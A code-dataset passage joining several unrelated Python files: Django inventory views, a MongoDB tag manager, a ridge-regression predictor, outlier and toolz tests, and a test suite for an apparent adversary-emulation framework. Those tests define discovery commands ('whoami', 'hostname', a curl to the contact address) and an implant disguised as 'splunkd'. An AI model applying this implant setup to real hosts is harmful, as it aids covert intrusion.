request.user.employee.employee_privillage == privillage['sales']:\n\t\treturn render(request,'inventory/homepage.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\t\t\n\n@login_required(login_url='/login/')\ndef ViewProduct(request,*args,**kargs):\n\tuser = request.user\n\t\n\t# access to item creation page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin']:\n\t\treturn render(request,'inventory/product.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n@login_required(login_url='/login/')\ndef ViewCustomer(request,*args,**kargs):\n\tuser = request.user\n\t# access to the order/sales page limited to admin 1 and 2 and sales person 3\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['sales']:\n\t\treturn render(request,'inventory/customer.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n@login_required(login_url='/login/')\ndef ViewCounter(request,*args,**kargs):\n\n\tuser = request.user\n\t\n\t# access to item inventory/godown page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['godown']:\n\t\treturn render(request,'inventory/inventory.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n@login_required(login_url='/login/')\ndef ViewSettings(request,*args,**kargs):\n\n\t# less than 2 is admin\n# just testing \n# real <=2 i.e <= ssistantadmin\n\tif request.user.employee.employee_privillage <=privillage['assistantadmin']:\n\t\treturn render(request,'inventory/settings.html',{})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n@login_required(login_url='/login/')\ndef ViewExpense(request,*args,**kargs):\n\n\tuser = request.user\n\t\n\t# access to item inventory/godown page limited to admin 1 and 2\n\tif request.user.employee.employee_privillage <= privillage['assistantadmin'] or request.user.employee.employee_privillage == privillage['bursar']:\n\t\treturn render(request,'inventory/bursar.html',{'user':user})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n@login_required(login_url='/login/')\ndef ViewProfile(request,*args,**kargs):\n\tuser = request.user\n\t\n\treturn render(request,'inventory/profile.html',{'user':user})\n\t\n\t\ndef ViewLogin(request,*args,**kargs):\n\tform=ItemForm()\n\tif(request.method=='POST'):\n\n\t\tusername = request.POST['username']\n\t\tpassword = request.POST['password']\n\t\tuser = authenticate(request, username=username, password=password)\n\n\t\tif user is not None:\n\n\t\t login(request, user)\n\n\t\t # logout(request)\n\t\t return redirect('base')\n\n\t\telse:\n\t\t\treturn render(request,'inventory/login.html',{})\t\n\n\telif(request.method=='GET'):\n\t\tlogout(request)\n\t\treturn render(request,'inventory/login.html',{'form':form})\t\t\n\n\n@login_required(login_url='/login/')\ndef ViewAuthorize(request,*args,**kargs):\n\n\t# less than 2 is admin\n\n\tif request.user.employee.employee_privillage <=privillage['assistantadmin']:\n\t\treturn render(request,'inventory/authorize.html',{})\n\telse:\n\t\treturn redirect(pathselector[request.user.employee.employee_privillage])\n\n\n\n\n# print(args)\n\t# print(kagrs)\n\n\t# method one\n\t# try :\n\t# \tobj = Item.objects.get(color=kagrs['color'])\n\t# except:\n\t# \tobj=Item.objects.all().first()\n\n\t# method 2\n\t# qs=Item.objects.filter(color=kagrs['color'])\n\t# if qs.exists() and qs.count()>=1:\n\t# \tobj=qs.first()\n\t\n\t# method 3\n\t# obj=get_object_or_404(Item,id=color)\n\t# obj_color=obj.item_name\n\t# # print(request.method)\n\t# sales=Sales.objects.filter(id=request.POST['id'])\n\t\n\n\n\n\t\t# sales=Sales.objects.filter(sales_received=False)\n\t# if sales.exists() and sales.count()>=1:\t\n\t# \tfor sale in sales:\n\t# \t\tsale.update(sales_received=True)\n\t# else:\n\t# \tsales.update(sales_received=True)\n\n\n\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"345305294","text":"import lib.util as util\nfrom lib import config\nfrom lib import mongo_util\nfrom lib.string_const import COMMON_STRING\nfrom lib.string_const import DB_STRING\nall_script_collection = mongo_util.get_collection(DB_STRING.DB_NAME, DB_STRING.TABLE_ALL_TAG)\nscript_tag_collection = mongo_util.get_collection(DB_STRING.DB_NAME, DB_STRING.TABLE_SCRIPT_TAG)\n\n\ndef add_script_tag(name, platform, tag):\n result = None\n post_insert = {'name': name, 'platform': platform, 'tags': tag}\n result_find = mongo_util.find_one(script_tag_collection, name=name, platform=platform)\n if not result_find:\n mongo_util.insert_one(script_tag_collection, post_insert)\n result = 'Success: Add Tag\"' + tag + '\"!'\n else:\n tags = result_find['tags']\n tag_list = tags.split(',')\n if tag in tag_list:\n return 'Error: Tag \" ' + tag + '\" already exists!'\n if tags == '':\n tags = tag\n else:\n tags = tags + ',' + tag\n post_script = {'$set': {'tags': tags}}\n mongo_util.update_one(script_tag_collection, post_script, name=name, platform=platform)\n result = 'Success: Add Tag\" ' + tag + '\"!'\n return result\n\n\ndef delete_script_tag(name, tag, platform):\n result = None\n result_find = mongo_util.find_one(script_tag_collection, name=name, platform=platform)\n if result_find:\n tags = result_find['tags']\n tag_list = tags.split(',')\n tags_new = ''\n if tag in tag_list:\n tag_list.remove(tag)\n for tag in tag_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_script = {'$set': {'tags': tags_new}}\n result = mongo_util.update_one(script_tag_collection, post_script, name=name, platform=platform)\n\n\ndef add_to_all_tags(tag):\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n post_insert = {'tags': tag}\n mongo_util.insert_one(all_script_collection, post_insert)\n return COMMON_STRING.DONE\n else:\n tags = result_find['tags']\n tags_list = tags.split(',')\n if tag in tags_list:\n return '\"' + tag + '\" already exists!'\n tags = tags + ',' + tag\n post_tags = {'$set': {'tags': tags}}\n mongo_util.update_one(all_script_collection, post_tags)\n return COMMON_STRING.DONE\n\n\ndef get_abandoned_tags():\n result_find = mongo_util.find_one(all_script_collection)\n abandon_list = []\n if not result_find:\n return ''\n tags = result_find['tags']\n tags_list = tags.split(',')\n for tag in tags_list:\n if not is_using_tag(tag):\n abandon_list.append(tag)\n return abandon_list\n\n\ndef delete_one_tag(tag_name):\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n return 'Cannot Find Tags !'\n tags = result_find['tags']\n tags_list = tags.split(',')\n tags_list.remove(tag_name)\n tags_new = ''\n for tag in tags_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_tags = {'$set': {'tags': tags_new}}\n mongo_util.update_one(all_script_collection, post_tags)\n return 'Success: Delete Tag\"' + tag_name + '\" !'\n\n\ndef delete_abandoned_tags():\n result_find = mongo_util.find_one(all_script_collection)\n if not result_find:\n return 'Cannot Find Tags !'\n tags = result_find['tags']\n tags_list = tags.split(',')\n tags_list_iterator = tags_list.copy()\n for tag in tags_list_iterator:\n if not is_using_tag(tag):\n tags_list.remove(tag)\n tags_new = ''\n for tag in tags_list:\n if tags_new == '':\n tags_new = tag\n else:\n tags_new = tags_new + ',' + tag\n post_tags = {'$set': {'tags': tags_new}}\n mongo_util.update_one(all_script_collection, post_tags)\n return 'Success: Delete Abadoned Tags !'\n\n\ndef is_using_tag(tag_name):\n result_find = mongo_util.find(script_tag_collection)\n if not result_find:\n return False\n for rel in result_find:\n if not rel['tags']:\n continue\n list_tags = rel['tags'].split(',')\n if tag_name in list_tags:\n return True\n return False\n\n\ndef get_all_tags():\n result = mongo_util.find_one(all_script_collection)\n if result:\n return result['tags'].split(',')\n else:\n return ''\n\n\ndef get_script_tags(script_name=None, platform=None):\n if script_name:\n result = mongo_util.find_one(script_tag_collection, name=script_name, platform=platform)\n if result:\n if result['tags']:\n return result['tags'].split(',')\n else:\n return None\n else:\n dict_result = []\n result = mongo_util.find(script_tag_collection)\n if result:\n for rel in result:\n list_tags = rel['tags'].split(',')\n dict_result.append([rel['name'], list_tags])\n return dict_result\n return None\n","sub_path":"server/extend/tag_manager/tag_manager.py","file_name":"tag_manager.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"299908428","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Predict relative engagement from content, with ridge regression.\n\nTime: ~2M\n\"\"\"\n\nfrom __future__ import division, print_function\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../'))\nimport time, datetime\nimport numpy as np\n\nfrom utils.helper import write_dict_to_pickle\nfrom utils.ridge_regressor import RidgeRegressor\n\n\ndef _load_data(filepath):\n \"\"\"Load features space for content predictor.\"\"\"\n matrix = []\n vids = []\n with open(filepath, 'r') as fin:\n fin.readline()\n for line in fin:\n row = np.zeros(1+2+category_cnt+lang_cnt+1)\n vid, publish, duration, definition, category, detect_lang, _, _, _, _, _, re30, _ = line.rstrip().split('\\t', 12)\n vids.append(vid)\n row[0] = np.log10(int(duration))\n if definition == '0':\n row[1] = 1\n else:\n row[2] = 1\n row[3+category_dict[category]] = 1\n row[3+category_cnt+lang_dict[detect_lang]] = 1\n row[-1] = float(re30)\n matrix.append(row)\n print('>>> Finish loading file {0}!'.format(filepath))\n return matrix, vids\n\n\nif __name__ == '__main__':\n # == == == == == == == == Part 1: Set up experiment parameters == == == == == == == == #\n start_time = time.time()\n\n category_dict = {'1': 0, '2': 1, '10': 2, '15': 3, '17': 4, '19': 5, '20': 6, '22': 7, '23': 8, '24': 9,\n '25': 10, '26': 11, '27': 12, '28': 13, '29': 14, '30': 15, '43': 16, '44': 17}\n category_cnt = len(category_dict)\n lang_dict = {'af': 0, 'ar': 1, 'bg': 2, 'bn': 3, 'ca': 4, 'cs': 5, 'cy': 6, 'da': 7, 'de': 8, 'el': 9, 'en': 10,\n 'es': 11, 'et': 12, 'fa': 13, 'fi': 14, 'fr': 15, 'gu': 16, 'he': 17, 'hi': 18, 'hr': 19, 'hu': 20,\n 'id': 21, 'it': 22, 'ja': 23, 'kn': 24, 'ko': 25, 'lt': 26, 'lv': 27, 'mk': 28, 'ml': 29, 'mr': 30,\n 'ne': 31, 'nl': 32, 'no': 33, 'pa': 34, 'pl': 35, 'pt': 36, 'ro': 37, 'ru': 38, 'sk': 39, 'sl': 40,\n 'so': 41, 'sq': 42, 'sv': 43, 'sw': 44, 'ta': 45, 'te': 46, 'th': 47, 'tl': 48, 'tr': 49, 'uk': 50,\n 'ur': 51, 'vi': 52, 'zh-cn': 53, 'zh-tw': 54, 'NA': 55}\n lang_cnt = len(lang_dict)\n\n # == == == == == == == == Part 2: Load dataset == == == == == == == == #\n data_loc = '../../production_data/tweeted_dataset_norm'\n train_loc = os.path.join(data_loc, 'train_data')\n test_loc = os.path.join(data_loc, 'test_data')\n\n print('>>> Start to load training dataset...')\n train_matrix = []\n for subdir, _, files in os.walk(train_loc):\n for f in files:\n train_matrix.extend(_load_data(os.path.join(subdir, f))[0])\n train_matrix = np.array(train_matrix)\n\n print('>>> Start to load test dataset...')\n test_matrix = []\n test_vids = []\n for subdir, _, files in os.walk(test_loc):\n for f in files:\n matrix, vids = _load_data(os.path.join(subdir, f))\n test_matrix.extend(matrix)\n test_vids.extend(vids)\n test_matrix = np.array(test_matrix)\n\n print('>>> Finish loading all data!\\n')\n\n # predict test data from customized ridge regressor\n test_yhat = RidgeRegressor(train_matrix, test_matrix).predict()\n\n # get running time\n print('\\n>>> Total running time: {0}'.format(str(datetime.timedelta(seconds=time.time() - start_time)))[:-3])\n\n # write to pickle file\n to_write = True\n predict_result_dict = {vid: pred for vid, pred in zip(test_vids, test_yhat)}\n if to_write:\n print('>>> Prepare to write to pickle file...')\n print('>>> Number of videos in final test result dict: {0}'.format(len(predict_result_dict)))\n write_dict_to_pickle(dict=predict_result_dict, path='./output/content_predictor.p')\n","sub_path":"re_regressors/content_predictor.py","file_name":"content_predictor.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"508907370","text":"import pytest\n\nfrom app.objects.c_ability import Ability\nfrom app.objects.c_agent import Agent\nfrom app.objects.c_adversary import Adversary\nfrom app.objects.c_obfuscator import Obfuscator\nfrom app.objects.c_operation import Operation\nfrom app.objects.c_objective import Objective\nfrom app.objects.secondclass.c_executor import Executor\nfrom app.objects.secondclass.c_goal import Goal\nfrom app.objects.c_planner import Planner\nfrom app.objects.c_source import Source\nfrom app.utility.base_world import BaseWorld\n\n\n@pytest.fixture\nasync def setup_rest_svc_test(data_svc):\n BaseWorld.apply_config(name='main', config={'app.contact.http': '0.0.0.0',\n 'plugins': ['sandcat', 'stockpile'],\n 'crypt_salt': 'BLAH',\n 'api_key': 'ADMIN123',\n 'encryption_key': 'ADMIN123',\n 'exfil_dir': '/tmp'})\n await data_svc.store(\n Ability(ability_id='123', name='testA', executors=[\n Executor(name='psh', platform='windows', command='curl #{app.contact.http}')\n ])\n )\n await data_svc.store(\n Ability(ability_id='456', name='testB', executors=[\n Executor(name='sh', platform='linux', command='whoami')\n ])\n )\n await data_svc.store(\n Ability(ability_id='789', name='testC', executors=[\n Executor(name='sh', platform='linux', command='hostname')\n ])\n )\n adversary = Adversary(adversary_id='123', name='test', description='test', atomic_ordering=[])\n await data_svc.store(adversary)\n\n agent = Agent(paw='123', sleep_min=2, sleep_max=8, watchdog=0, executors=['pwsh', 'psh'], platform='windows')\n await data_svc.store(agent)\n\n await data_svc.store(\n Objective(id='495a9828-cab1-44dd-a0ca-66e58177d8cc', name='default', goals=[Goal()])\n )\n\n await data_svc.store(\n Planner(planner_id='123', name='test', module='test', params=dict())\n )\n\n source = Source(id='123', name='test', facts=[], adjustments=[])\n await data_svc.store(source)\n\n await data_svc.store(\n Operation(name='test', agents=[agent], adversary=adversary, id='123', source=source)\n )\n\n await data_svc.store(\n Obfuscator(name='plain-text',\n description='Does no obfuscation to any command, instead running it in plain text',\n module='plugins.stockpile.app.obfuscators.plain_text')\n )\n\n\n@pytest.mark.usefixtures(\n \"setup_rest_svc_test\"\n)\nclass TestRestSvc:\n\n def test_delete_operation(self, event_loop, rest_svc, data_svc):\n # PART A: Create an operation\n expected_operation = {'name': 'My Test Operation',\n 'adversary': {'description': 'an empty adversary profile', 'name': 'ad-hoc',\n 'adversary_id': 'ad-hoc', 'atomic_ordering': [],\n 'objective': '495a9828-cab1-44dd-a0ca-66e58177d8cc',\n 'tags': [], 'has_repeatable_abilities': False, 'plugin': None}, 'state': 'finished',\n 'planner': {'name': 'test', 'description': None, 'module': 'test',\n 'stopping_conditions': [], 'params': {}, 'allow_repeatable_abilities': False,\n 'ignore_enforcement_modules': [], 'id': '123', 'plugin': ''}, 'jitter': '2/8',\n 'host_group': [{'trusted': True, 'architecture': 'unknown', 'watchdog': 0,\n 'contact': 'unknown', 'username': 'unknown', 'links': [], 'sleep_max': 8,\n 'exe_name': 'unknown', 'executors': ['pwsh', 'psh'], 'ppid': 0,\n 'sleep_min': 2, 'server': '://None:None', 'platform': 'windows',\n 'host': 'unknown', 'paw': '123', 'pid': 0,\n 'display_name': 'unknown$unknown', 'group': 'red', 'location': 'unknown',\n 'privilege': 'User', 'proxy_receivers': {}, 'proxy_chain': [],\n 'origin_link_id': '', 'deadman_enabled': False,\n 'available_contacts': ['unknown'], 'pending_contact': 'unknown',\n 'host_ip_addrs': [], 'upstream_dest': '://None:None'}],\n 'visibility': 50, 'autonomous': 1, 'chain': [], 'auto_close': False,\n 'obfuscator': 'plain-text', 'use_learning_parsers': False,\n 'group': '',\n 'source': '',\n 'objective': {'goals': [{'value': 'complete',\n 'operator': '==',\n 'target': 'exhaustion',\n 'achieved': False,\n 'count': 1048576}],\n 'percentage': 0.0, 'description': '',\n 'id': '495a9828-cab1-44dd-a0ca-66e58177d8cc',\n 'name': 'default'}}\n internal_rest_svc = rest_svc(event_loop)\n operation = event_loop.run_until_complete(internal_rest_svc.create_operation(access=dict(\n access=(internal_rest_svc.Access.RED, internal_rest_svc.Access.APP)),\n data=dict(name='My Test Operation', planner='test', source='123', state='finished')))\n operation_id = operation[0][\"id\"]\n expected_operation['id'] = operation_id\n found_operation = event_loop.run_until_complete(data_svc.locate('operations', match=dict(id=operation_id)))[0].display\n found_operation['host_group'][0].pop('last_seen')\n found_operation.pop('start')\n found_operation[\"host_group\"][0].pop(\"created\")\n assert found_operation == expected_operation\n\n # PART B: Delete the operation (that was created in Part A) from the data service\n delete_criteria = {'id': operation_id, 'finish': None, 'base_timeout': 180, 'link_timeout': 30,\n 'name': 'My Test Operation', 'jitter': '2/8', 'state': 'finished', 'autonomous': True,\n 'last_ran': None, 'obfuscator': 'plain-text', 'auto_close': False, 'visibility': 50,\n 'chain': [], 'potential_links': []}\n event_loop.run_until_complete(internal_rest_svc.delete_operation(delete_criteria))\n assert event_loop.run_until_complete(data_svc.locate('operations', match=dict(id=operation_id))) == []\n\n def test_update_config(self, event_loop, data_svc, rest_svc):\n internal_rest_svc = rest_svc(event_loop)\n # check that an ability reflects the value in app. property\n pre_ability = event_loop.run_until_complete(data_svc.locate('abilities', dict(ability_id='123')))\n assert '0.0.0.0' == BaseWorld.get_config('app.contact.http')\n assert 'curl 0.0.0.0' == next(pre_ability[0].executors).test\n\n # update property\n event_loop.run_until_complete(internal_rest_svc.update_config(data=dict(prop='app.contact.http', value='127.0.0.1')))\n\n # verify ability reflects new value\n post_ability = event_loop.run_until_complete(data_svc.locate('abilities', dict(ability_id='123')))\n assert '127.0.0.1' == BaseWorld.get_config('app.contact.http')\n assert 'curl 127.0.0.1' == next(post_ability[0].executors).test\n\n def test_update_config_plugin(self, event_loop, rest_svc):\n internal_rest_svc = rest_svc(event_loop)\n # update plugin property\n assert ['sandcat', 'stockpile'] == BaseWorld.get_config('plugins')\n event_loop.run_until_complete(internal_rest_svc.update_config(data=dict(prop='plugin', value='ssl')))\n assert ['sandcat', 'stockpile', 'ssl'] == BaseWorld.get_config('plugins')\n\n def test_create_operation(self, event_loop, rest_svc, data_svc):\n want = {'name': 'Test',\n 'adversary': {'description': 'an empty adversary profile', 'name': 'ad-hoc', 'adversary_id': 'ad-hoc',\n 'atomic_ordering': [], 'objective': '495a9828-cab1-44dd-a0ca-66e58177d8cc', 'tags': [],\n 'has_repeatable_abilities': False, 'plugin': None},\n 'state': 'finished',\n 'planner': {'name': 'test', 'description': None, 'module': 'test', 'stopping_conditions': [],\n 'params': {},\n 'ignore_enforcement_modules': [], 'id': '123', 'allow_repeatable_abilities': False, 'plugin': ''},\n 'jitter': '2/8',\n 'group': '',\n 'source': '',\n 'host_group': [\n {'trusted': True, 'architecture': 'unknown', 'watchdog': 0, 'contact': 'unknown',\n 'username': 'unknown', 'links': [], 'sleep_max': 8, 'exe_name': 'unknown',\n 'executors': ['pwsh', 'psh'], 'ppid': 0, 'sleep_min': 2, 'server': '://None:None',\n 'platform': 'windows', 'host': 'unknown', 'paw': '123', 'pid': 0,\n 'display_name': 'unknown$unknown', 'group': 'red', 'location': 'unknown', 'privilege': 'User',\n 'proxy_receivers': {}, 'proxy_chain': [], 'origin_link_id': '',\n 'deadman_enabled': False, 'available_contacts': ['unknown'], 'pending_contact': 'unknown',\n 'host_ip_addrs': [], 'upstream_dest': '://None:None'}],\n 'visibility': 50, 'autonomous': 1, 'chain': [], 'auto_close': False, 'objective': '',\n 'obfuscator': 'plain-text', 'use_learning_parsers': False}\n internal_rest_svc = rest_svc(event_loop)\n operation = event_loop.run_until_complete(internal_rest_svc.create_operation(access=dict(\n access=(internal_rest_svc.Access.RED, internal_rest_svc.Access.APP)),\n data=dict(name='Test', planner='test', source='123', state='finished')))\n operation[0].pop('id')\n operation[0]['host_group'][0].pop('last_seen')\n operation[0].pop('start')\n operation[0]['host_group'][0].pop('created')\n assert want == operation[0]\n\n def test_delete_ability(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n response = event_loop.run_until_complete(internal_rest_svc.delete_ability(data=dict(ability_id='123')))\n assert 'Delete action completed' == response\n\n def test_persist_objective_single_new(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n req = {\n 'name': 'new objective',\n 'description': 'test new objective',\n 'goals': [\n {\n 'count': 1,\n 'operator': '*',\n 'target': 'host.user.name',\n 'value': 'NA'\n }\n ]\n }\n objs = event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, req))\n # clear out subobject difference\n objs[0]['goals'][0].pop('achieved')\n assert req.items() <= objs[0].items()\n\n def test_persist_objective_single_existing(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n req = {\n 'name': 'new objective',\n 'description': 'test new objective',\n 'goals': [\n {\n 'count': 1,\n 'operator': '*',\n 'target': 'host.user.name',\n 'value': 'NA'\n }\n ]\n }\n objs = event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, req))\n # clear out subobject difference\n objs[0]['goals'][0].pop('achieved')\n assert req.items() <= objs[0].items()\n # modify\n modified_req = {'id': objs[0]['id'], 'description': 'modified objective'}\n modified_objs = event_loop.run_until_complete(internal_rest_svc.persist_objective({'access': [BaseWorld.Access.RED]}, modified_req))\n assert modified_req.items() <= modified_objs[0].items()\n\n def test_delete_adversary(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n data = \"\"\"\n---\n- id: 123\n name: test\n description: test\n atomic_ordering:\n \"\"\"\n with open('data/adversaries/123.yml', 'w') as f:\n f.write(data)\n response = event_loop.run_until_complete(internal_rest_svc.delete_adversary(data=dict(adversary_id='123')))\n assert 'Delete action completed' == response\n\n def test_delete_agent(self, event_loop, rest_svc, file_svc):\n internal_rest_svc = rest_svc(event_loop)\n response = event_loop.run_until_complete(internal_rest_svc.delete_agent(data=dict(paw='123')))\n assert 'Delete action completed' == response\n\n def test_get_potential_links(self, event_loop, rest_svc, planning_svc, data_svc):\n internal_rest_svc = rest_svc(event_loop)\n internal_rest_svc.add_service('planning_svc', planning_svc)\n internal_rest_svc.add_service('data_svc', data_svc)\n links = event_loop.run_until_complete(internal_rest_svc.get_potential_links('123', '123'))\n assert 1 == len(links['links'])\n\n def test_apply_potential_link(self, event_loop, rest_svc, planning_svc, data_svc, app_svc):\n internal_rest_svc = rest_svc(event_loop)\n internal_rest_svc.add_service('planning_svc', planning_svc)\n internal_rest_svc.add_service('data_svc', data_svc)\n internal_rest_svc.add_service('app_svc', app_svc)\n event_loop.run_until_complete(internal_rest_svc.get_potential_links('123', '123'))\n operation = event_loop.run_until_complete(data_svc.locate('operations', match=dict(id='123'))).pop()\n link = operation.potential_links[0]\n event_loop.run_until_complete(internal_rest_svc.apply_potential_link(link))\n assert 1 == len(operation.chain)\n\n def test_set_single_bootstrap_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '123',\n 'deadman_abilities': ''\n }\n want = ['123']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n\n def test_set_multiple_bootstrap_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '123, 456, 789',\n 'deadman_abilities': ''\n }\n want = ['123', '456', '789']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n\n def test_clear_bootstrap_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '',\n }\n want = []\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('bootstrap_abilities') == want\n assert agent_config.get('deadman_abilities') == want\n\n def test_set_single_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '123'\n }\n want = ['123']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('deadman_abilities') == want\n\n def test_set_multiple_deadman_ability(self, event_loop, rest_svc):\n update_data = {\n 'sleep_min': 5,\n 'sleep_max': 5,\n 'watchdog': 0,\n 'untrusted': 90,\n 'implant_name': 'splunkd',\n 'bootstrap_abilities': '',\n 'deadman_abilities': '123, 456, 789'\n }\n want = ['123', '456', '789']\n internal_rest_svc = rest_svc(event_loop)\n agent_config = event_loop.run_until_complete(internal_rest_svc.update_agent_data(update_data))\n assert agent_config.get('deadman_abilities') == want\n","sub_path":"tests/services/test_rest_svc.py","file_name":"test_rest_svc.py","file_ext":"py","file_size_in_byte":17549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"426420551","text":"import numpy as np\n\ndef tukey_test(values):\n q1 = np.quantile(values,0.25)\n q3 = np.quantile(values,0.75)\n iqr = q3-q1\n inner_fence = 1.5*iqr\n outer_fence = 3*iqr\n\n #inner fence lower and upper end\n inner_fence_le = q1-inner_fence\n inner_fence_ue = q3+inner_fence\n\n #outer fence lower and upper end\n outer_fence_le = q1-outer_fence\n outer_fence_ue = q3+outer_fence\n\n outliers_prob = np.sort(np.concatenate([np.where(values<=outer_fence_le)[0],np.where(values>=outer_fence_ue)[0]]))\n outliers_poss = np.sort(np.concatenate([np.where(values<=inner_fence_le)[0],np.where(values>=inner_fence_ue)[0]]))\n\n return outliers_prob,outliers_poss\n","sub_path":"phenixml/utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"182776512","text":"from toolz import curry, unique, first\nfrom toolz.sandbox.core import EqualityHashKey\n\n\ndef test_EqualityHashKey_default_key():\n EqualityHashDefault = curry(EqualityHashKey, None)\n L1 = [1]\n L2 = [2]\n data1 = [L1, L1, L2, [], [], [1], [2], {}, ()]\n set1 = set(map(EqualityHashDefault, data1))\n set2 = set(map(EqualityHashDefault, [[], [1], [2], {}, ()]))\n assert set1 == set2\n assert len(set1) == 5\n\n # Test that ``EqualityHashDefault(item)`` is distinct from ``item``\n T0 = ()\n T1 = (1,)\n data2 = list(map(EqualityHashDefault, [T0, T0, T1, T1, (), (1,)]))\n data2.extend([T0, T1, (), (1,)])\n set3 = set(data2)\n assert set3 == set([(), (1,), EqualityHashDefault(()),\n EqualityHashDefault((1,))])\n assert len(set3) == 4\n assert EqualityHashDefault(()) in set3\n assert EqualityHashDefault((1,)) in set3\n\n # Miscellaneous\n E1 = EqualityHashDefault(L1)\n E2 = EqualityHashDefault(L2)\n assert str(E1) == '=[1]='\n assert repr(E1) == '=[1]='\n assert E1 != E2\n assert not (E1 == E2)\n assert E1 == EqualityHashDefault(L1)\n assert not (E1 != EqualityHashDefault(L1))\n assert E1 != L1\n assert not (E1 == L1)\n\n\ndef test_EqualityHashKey_callable_key():\n # Common simple hash key functions.\n EqualityHashLen = curry(EqualityHashKey, len)\n EqualityHashType = curry(EqualityHashKey, type)\n EqualityHashId = curry(EqualityHashKey, id)\n EqualityHashFirst = curry(EqualityHashKey, first)\n data1 = [[], [1], (), (1,), {}, {1: 2}]\n data2 = [[1, 2], (1, 2), (1, 3), [1, 3], [2, 1], {1: 2}]\n assert list(unique(data1*3, key=EqualityHashLen)) == data1\n assert list(unique(data2*3, key=EqualityHashLen)) == data2\n assert list(unique(data1*3, key=EqualityHashType)) == data1\n assert list(unique(data2*3, key=EqualityHashType)) == data2\n assert list(unique(data1*3, key=EqualityHashId)) == data1\n assert list(unique(data2*3, key=EqualityHashId)) == data2\n assert list(unique(data2*3, key=EqualityHashFirst)) == data2\n\n\ndef test_EqualityHashKey_index_key():\n d1 = {'firstname': 'Alice', 'age': 21, 'data': {}}\n d2 = {'firstname': 'Alice', 'age': 34, 'data': {}}\n d3a = {'firstname': 'Bob', 'age': 56, 'data': {}}\n d3b = {'firstname': 'Bob', 'age': 56, 'data': {}}\n EqualityHashFirstname = curry(EqualityHashKey, 'firstname')\n assert list(unique(3*[d1, d2, d3a, d3b],\n key=EqualityHashFirstname)) == [d1, d2, d3a]\n EqualityHashFirstnameAge = curry(EqualityHashKey, ['firstname', 'age'])\n assert list(unique(3*[d1, d2, d3a, d3b],\n key=EqualityHashFirstnameAge)) == [d1, d2, d3a]\n list1 = [0] * 10\n list2 = [0] * 100\n list3a = [1] * 10\n list3b = [1] * 10\n EqualityHash0 = curry(EqualityHashKey, 0)\n assert list(unique(3*[list1, list2, list3a, list3b],\n key=EqualityHash0)) == [list1, list2, list3a]\n","sub_path":"toolz/sandbox/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248729294","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom glob import iglob, glob\nfrom os.path import basename, dirname, join as p_join\nimport json\n\nimport numpy as 